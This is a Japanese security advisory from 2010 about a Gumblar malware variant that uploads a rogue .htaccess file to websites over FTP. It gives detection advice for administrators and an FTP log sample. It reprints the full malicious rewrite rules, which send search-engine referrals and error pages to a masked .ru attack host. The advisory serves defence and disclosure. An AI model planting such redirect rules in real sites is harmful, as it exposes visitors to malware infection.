セキュリティ対策の株式会社ラック

お問い合わせ
閉じる

企業や組織のセキュリティ事故発生時はこちら

緊急対応窓口:サイバー救急センター®

ご相談は予約不要、24時間対応

電話で相談する
0120-362-119
メールで相談する
サイバー救急センター®のメールアドレス
自分で調べる
「FalconNest」について
お問い合わせ

セキュリティ事故発生時はこちら

アーカイブ

Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認

2010年3月3日 | 注意喚起

※本注意喚起は、2009年12月25日【Gumblar(ガンブラー)ウイルスの組織内感染拡大とホームページ改ざん被害増加に伴う対策の確認】の続報です。

株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。現在判明していることは次のような内容です。

攻撃確認日

  • ラックがこの攻撃を最初に認識したのは2010年3月1日です
  • FTP転送のログから、少なくとも2010年1月上旬にはこの攻撃が発生していたと推測しています

【動作概要】

この.htaccessファイルが置かれる影響は、主要検索サイトからのアクセス、および404、403などのエラーがApacheのリダイレクト機能で攻撃サイトに転送されることです。攻撃サイトに転送された後、他のGumblar攻撃と同様に、悪性プログラムの感染被害に遭われることが推測されます。

【従来型Gumblarとの相違点】

従来のGumblar攻撃と異なる点は、次の2点が判明しています。

1.ユーザはJavaScriptの対策だけでは防げない

Firefox + NoScriptの組み合わせでは防げない可能性があり、RequestPolicyなどのリダイレクト対策が可能なアドオンを利用する必要があります。

2.コンテンツファイル監視だけでは気付くことができない

コンテンツファイル自体は改ざんされておらず、さらにブックマーク(お気に入り)やURL直接入力でサイトを表示した場合は影響を受けないため、Webサイト管理者が被害に気付きにくい。

【Webサーバ管理者の対策】

身に覚えのない.htaccessファイルが存在しないかを確認してください。FTP転送ログで.htaccessファイルがアップロードされていないかを確認するのも有効です。

確認されたログのサンプル

FTP
Jan dd hh:mm:ss 2010 1 x.x.x.x 1278 /home/xxxx/.htaccess b _ i r xxxx ftp 0 * c

※ 現在のところ、トップディレクトリに単発でアップロードされていることを確認しています。

アップロードされる「.htaccess」ファイル

# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://********.ru/ [R=301,L]
ErrorDocument 401 http://********.ru/
ErrorDocument 403 http://********.ru/
ErrorDocument 404 http://********.ru/
ErrorDocument 500 http://********.ru/
# /HostRule

以上

【本注意喚起に関するお問い合わせ先】
株式会社ラック サイバー救急センター
電話:03-5537-0119 / E-Mail: サイバー救急センターメール

アーカイブ一覧に戻る

メールマガジン

サイバーセキュリティや
ラックに関する情報を
お届けします。

登録する

page top